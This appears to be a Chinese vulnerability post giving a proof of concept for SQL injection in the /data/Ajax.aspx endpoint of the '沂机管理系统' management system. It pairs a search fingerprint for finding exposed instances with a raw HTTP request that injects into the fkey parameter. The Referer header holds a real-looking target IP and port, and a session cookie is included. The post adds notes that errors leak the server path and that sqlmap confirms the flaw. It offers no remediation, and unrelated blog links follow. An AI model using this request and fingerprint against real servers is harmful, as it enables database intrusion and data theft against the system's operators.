沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞

漏洞描述

沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞,攻击者可以获取服务器权限

漏洞复现

body="后台管理系统演示版"

POC

GET /data/Ajax.aspx?method=log_list&page=1&limit=20&fkey=1'&fdate1=2024-10-01+00%3A00%3A00&fdate2=2024-10-01+23%3A59%3A59 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/log_list.aspx?ModuleID=104&navtabid=a102&reporttitle=60xZrkSLVc4i9GTkoGayYA==&fwidth=600&fheight=355
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive

bp 报错泄露绝对路径

sqlmap确认有漏洞

相关推荐
程序员大金13 分钟前
基于SpringBoot+Vue+MySQL的美食信息推荐系统
前端·vue.js·spring boot·后端·mysql·spring·美食
m0_7388202020 分钟前
浏览器预解析机制
前端
无限大.28 分钟前
0基础学前端 day9--css布局
前端·css
悦涵仙子43 分钟前
创建Express后端项目
前端·javascript·express
谢尔登1 小时前
【Vue】为什么 Vue 不使用 React 的分片更新?
前端·vue.js·react.js
神即道 道法自然 如来1 小时前
测试面试题:数据库表连接查询:子查询、内连接、外连接
数据库·sql·oracle
coderWangbuer1 小时前
基于SSH的酒店管理系统的设计与实现 (含源码+sql+视频导入教程+文档+PPT)
运维·sql·ssh
clmm_2 小时前
Vue和axios零基础学习
前端·javascript·vue.js
人生の三重奏2 小时前
前端——Ajax和jQuery
前端·ajax·jquery